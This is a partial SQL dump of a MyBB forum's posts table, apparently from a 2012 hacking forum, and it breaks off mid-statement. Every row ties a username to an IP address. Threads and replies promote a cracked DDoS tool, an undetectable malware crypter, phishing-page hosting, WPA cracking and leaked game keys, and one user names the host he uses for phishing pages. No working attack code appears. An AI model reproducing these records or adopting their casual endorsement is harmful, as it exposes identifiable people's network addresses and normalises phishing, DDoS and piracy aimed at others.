`mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5995', '1034', '5962', '81', 'RE: [Cracked] Dark DDoSeR 5.1', '0', '100', '??zg???g????61', '1350861734', 'Does it use shells? Thats what I assume at least.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c0386337c92dbd49517bfaf4930aab95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5996', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '82', 'iTzIpod', '1350861755', 'Posting to see content... :) EDIT: Nice share :) It actually works. Awesome method. :)', '24.212.197.164', '416597412', '1', '0', '82', '1350861805', '1', '22de5c106fb1ada2241e7ee1ef0516de', '0', '1350861805'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5997', '1035', '5963', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '257', 'XxTREYZxX', '1350861857', 'thanks heaps for the great share mate appreciated, keep the good work up :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '339664d72b0f859933bfc7106926c04a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5998', '1039', '5984', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '82', 'iTzIpod', '1350862037', 'I\'ve seen this method multiple times. I don\'t think it\'ll help a person like me though. :p But oh well. Different people = Different opinions. :) I would\'ve leaked it onto LH but then I thought it was LQ and wouldn\'t help anyone. Again, that\'s my opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '76a9f15e804188f77c4d430e00152322', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5999', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '222', 'Exposé', '1350862088', 'What\'s up with the sig\'s? All I see is text. And thanks for the update joker :)', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '8f6347be0ae70d040763c867b19b7b9e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6000', '1042', '0', '3', '[Bug] MyCodes in Signature', '0', '82', 'iTzIpod', '1350862152', '[img]http://i.imgur.com/pHiMD.png[/img] It\'s a bug. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '201e9071173ccb4e0195d51bf7569988', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6001', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1350862195', '/me Is eating twizzlers atm and they are fuckin amazing', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '146661902a5b859321bd271920493f9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6002', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350862242', '/me is currently typing this post.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c2180c714ddbee4bc587b4391220039', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6003', '1042', '6000', '3', 'RE: [Bug] MyCodes in Signature', '0', '1', 't3h jok3r', '1350862243', 'Fixed. Thanks for the report.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8f3ad2e44eae0563f1be094322869dd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6004', '197', '696', '56', 'RE: /me Thread', '0', '257', 'XxTREYZxX', '1350862258', '/me is posting right at the moment LOL', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0c051b01b91727879c00325d51693e7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6005', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350862331', '/me is posting again. :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2142a7de94890d13c06546bdc80be5ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6006', '1036', '5975', '30', 'RE: Mega SEO Pack', '0', '257', 'XxTREYZxX', '1350862347', 'thanks man, keep up the good work, your doing great mate :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'be60725b91ba5d4a3d875c868f6c6662', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6007', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1350862356', '/me doesn\'t like all this obviousness', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '06816284c573217ab57b15a9ef0b0808', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6008', '197', '696', '56', 'RE: /me Thread', '0', '257', 'XxTREYZxX', '1350862414', '/me laughing at all the stupid post right now', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'debe3f2ed33fbbb96e40f5799d62cfd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6009', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '222', 'Exposé', '1350862415', 'Nice plugin but u should make it green and not red', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', 'dbb983568bb55d52d57ad85b8e362e3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6010', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350862415', '/me is talking to t3h jok3r on Skype.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '19ae5c57c1376e57da8879c872aeba07', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6011', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '257', 'XxTREYZxX', '1350862497', 'im posting so i can see the god damm link ahah', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'c551aaa759885ada021407fe4a984a2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6012', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '82', 'iTzIpod', '1350862503', '[quote=\'ƒ???????????g\' pid=\'6009\' dateline=\'1350862415\'] Nice plugin but u should make it green and not red [/quote] Why make it green? Making it red will attract more attention since our forum colors are green and black. Also, red is known for like \"STOP\" or whatever :p', '24.212.197.164', '416597412', '1', '0', '82', '1350862556', '1', '3f5b69a190bb0f5f2120d5c5b26b449d', '0', '1350862556'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6013', '1031', '6012', '7', 'RE: Testing new plugin public', '0', '257', 'XxTREYZxX', '1350862571', '[quote=\'iTzIpod\' pid=\'6012\' dateline=\'1350862503\'] Why make it green? Making it red will attract more attention since our forum colors are green and black. Also, red is known for like \"STOP\" or whatever :p [/quote] True story bud iTzIpod is wxactly right :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '22a1ce456e8b8056a8f42dc67f2ba865', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6014', '1031', '6013', '7', 'RE: Testing new plugin public', '0', '82', 'iTzIpod', '1350862722', '[quote=\'xEP1C_SC0P3Sx\' pid=\'6013\' dateline=\'1350862571\'] [quote=\'iTzIpod\' pid=\'6012\' dateline=\'1350862503\'] Why make it green? Making it red will attract more attention since our forum colors are green and black. Also, red is known for like \"STOP\" or whatever :p [/quote] True story bud iTzIpod is wxactly right :) [/quote] I try to put my logic into my posts ;) xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4c962c9a20b18018a58fb96987368829', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6015', '1039', '5984', '61', 'RE: Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '228', 'VirtualLegend', '1350862903', 'thanks for the share bro!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2aa267ba4d8a5fb3597be4355dabbb10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6016', '1041', '5994', '81', 'RE: How to get a FREE Skype Resolver/Cloudflare Resolver', '0', '100', '??zg???g????61', '1350863011', ':) no problem', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '37901ef2a33ae010e4203acfb1538d30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6017', '1032', '5999', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350863252', '[quote=\'ƒ???????????g\' pid=\'5999\' dateline=\'1350862088\'] What\'s up with the sig\'s? All I see is text. And thanks for the update joker :) [/quote] I messed up a setting but it\'s fixed now. [quote=\'xEP1C_SC0P3Sx\' pid=\'5989\' dateline=\'1350861455\'] we are growing more and more every day but not sure about the:you must post to unlock this link.Its kinda confusing. Go LH [/quote] It\'s to prevent leeching and help increase our forums posts. From this it will prevent people from saying \"it helps keep my thread up\" etc and this will give us another reason to be different from HF. [quote=\'R?????zo?\' pid=\'5974\' dateline=\'1350860735\'] I think the \"You must post to unlock this link\" is a good idea, but it also blocks links on people signatures. [/quote] True, because it basically reads all the links in the thread. They are viewable though after you post.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '65a58c4aa4a925ef67f12a60fa745816', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6018', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '228', 'VirtualLegend', '1350866741', 'Nice I\'m glad to be a part of this group', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd7b8be269b88383fb5a8b5431a682ef4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6019', '1043', '0', '58', '[NEW] Group Recruiting - DDoS\'ers', '1', '100', '??zg???g????61', '1350868687', 'Hey everyone, so my new group - DDoS\'ers is now RECRUITING! This is an open group- Anyone can join, IF I choose to let you in.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '-2', 'aea825442fad7534430a63f0337e9099', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6020', '2', '4', '34', 'RE: Userbar tut', '0', '222', 'Exposé', '1350870638', 'Thanks for the tut but already knew this :P', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '032d2f3c08d3da5d5d61cee137719da6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6021', '1031', '6009', '7', 'RE: Testing new plugin public', '0', '205', 'mothered', '1350871632', '[quote=\'ƒ???????????g\' pid=\'6009\' dateline=\'1350862415\'] Nice plugin but u should make it green and not red [/quote] I like the look of this. I do agree, that the red Is a little too strong, but green will clash with the theme, so perhaps trial and error with other colors?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6e8ddaf0c9ea7a48e09bcc3c5e27681f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6022', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '205', 'mothered', '1350871975', 'I like all changes mentioned. With the Movie RIPs section, rather than PM\'ing a staff member after 40 posts, can you set the permissions In the ACP? Meaning, access Is denied with less than 40 posts.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a935fcea8bc348ae7f3fb1073428f7af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6023', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '222', 'Exposé', '1350872138', 'Nah WPa2 is mad easy....dude just use Backtrack...and look up some tuts on how to use it...mad easy', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '06bb490447d9d3884ebb839e3be14cce', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6024', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '222', 'Exposé', '1350872190', 'Nice tut....but already know how to make generators..takes me like 2 seconds', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '2050931843bfba7ac447387404190431', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6025', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '205', 'mothered', '1350872442', 'WPA, WPA2, WPA/PSK, you can crack all of them. I\'ve done It many times.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f67bb0acffb1bfbda7446c9b2ddc8166', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6026', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '205', 'mothered', '1350872648', 'I\'ve done this In BackTrack 5 R2 a while back. It\'s certainly worth It. Thanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '47b95cdaccd554f4d28c8f88fefdb7fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6027', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '205', 'mothered', '1350872862', 'I know desktops are considered better for gaming, but you can match that with a lappy. For example, the Dell Alienware, with twin GTX 680 cards (SLI configured), will chew any game on maximum res.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e8d0a9c2be465ef76d1e1aec267a9ce7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6028', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '257', 'XxTREYZxX', '1350873082', 'yes thats a great laptop and prob the best :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '8c31a1b9a4e97fa51334382cc03d1ef3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6029', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '205', 'mothered', '1350873176', 'That\'s absolutely huge, I wouldn\'t know where to begin! Much appreciated mate, thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b730a5873e325aacf6ae2d941ea07023', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6030', '1017', '6025', '11', 'RE: Wifi hacking help :O', '0', '257', 'XxTREYZxX', '1350873271', '[quote=\'mothered\' pid=\'6025\' dateline=\'1350872442\'] WPA, WPA2, WPA/PSK, you can crack all of them. I\'ve done It many times. [/quote] thanks that hepled alot i will be closing the thread to prevent spam', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0cadecda8835a6d35d4a26fb071b42d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6031', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '257', 'XxTREYZxX', '1350873355', 'thanks for the great share mate keep the great work up a;O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'af3c5c9c98bd7f01ec03f2afd2bb1133', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6032', '902', '4937', '52', 'RE: Who wants a Tutorial on how to make a Generator in VB', '0', '257', 'XxTREYZxX', '1350873411', 'can you please tell us how thanks alot man', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'b75b999092fa32ba9e4d37fd82873bb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6033', '2', '4', '34', 'RE: Userbar tut', '0', '205', 'mothered', '1350873676', 'I\'ve always wondered how to make userbars. I\'m not very good with graphics, hence this\'ll certainly be of great help. Many thanks.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '501afc08ebf5fa0064c9f9b234a74f60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6034', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '222', 'Exposé', '1350873721', 'I use 000webhost lmao...which is pretty good', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'f213a58d6a418ff8863bcca6a0bc77a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6035', '1032', '6022', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350873877', '[quote=\'mothered\' pid=\'6022\' dateline=\'1350871975\'] I like all changes mentioned. With the Movie RIPs section, rather than PM\'ing a staff member after 40 posts, can you set the permissions In the ACP? Meaning, access Is denied with less than 40 posts. [/quote] Nice idea but then people will then spam the site with 40 posts, it will be the same with access is denied but we would know what\'s going on and it\'s a temporary thing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3451109dc2e55fec17e3887259f52e6b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6036', '1044', '0', '2', 'dkdadwa', '0', '61', 'NXK', '1350874777', '[color=#FF4500]eweew[/color][color=#708090][/color]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a22f0a69eb62be61059109cc07e00d81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6037', '1045', '0', '49', 'Group Format?', '0', '222', 'Exposé', '1350874906', 'I think we should have a group format plugin where it makes the username colored based on what group you are in...this is nice because you can differentiate between who is who... What do you guys think?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'f8796093c3215b8581bf0225c5a3b85e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6038', '1045', '6037', '49', 'RE: Group Format?', '0', '3', '??????????¢™', '1350875079', 'That can be set in the ACP for the Admins but yes I think this would be great.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '29128a181f23ca3fa31dcefcf057497e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6039', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350875114', 'Oh I thought this was a custom plugin...but ok even better :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '241d4d7998e0d96062ee5d381615a833', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6040', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '222', 'Exposé', '1350875164', 'Nice leak from SE.net lmao....already had these like a year ago :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '18b0b97cd6b51f7a82481b89b1f0f763', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6041', '1045', '6037', '49', 'RE: Group Format?', '0', '257', 'XxTREYZxX', '1350875167', 'yeah i agree that would be cool aye :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'f8185aea3b23f9048006e5d6b2e352cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6042', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '222', 'Exposé', '1350875325', 'I have a laptop HP Sleekbook and I use that for everything :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '4aac242852e35f828638680bab662496', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6043', '2', '4', '34', 'RE: Userbar tut', '0', '222', 'Exposé', '1350875414', 'Lol you could also find these on hf...this is where this is from lol', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'd7a3f4b742016c004bcefb0a3a03592c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6044', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, 